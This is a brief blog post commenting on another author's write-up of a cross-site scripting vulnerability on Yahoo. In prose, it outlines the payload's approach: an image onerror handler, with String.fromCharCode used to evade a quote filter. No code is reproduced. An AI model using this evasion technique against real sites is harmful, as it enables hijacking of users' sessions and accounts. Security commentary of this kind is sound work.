Rarely Greys posted a rather long article about how you can exploit users on Yahoo through cross site scripting vulnerabilities. The attack we all know and love. It’s a pretty interesting philosophical take on the issue actually. It does get technical near the end, including a PERL script to generate the attack on the fly.
In the end the vulnerability comes down to this exploit (click to see the XSS vulnerability). It uses an onerror event handler in an image, and since it can’t use quotes it uses String.fromCharCode to evade that. Well done. Not really news, except the writeup is pretty interesting as it goes into a lot more detail about how the attack works than I typically do.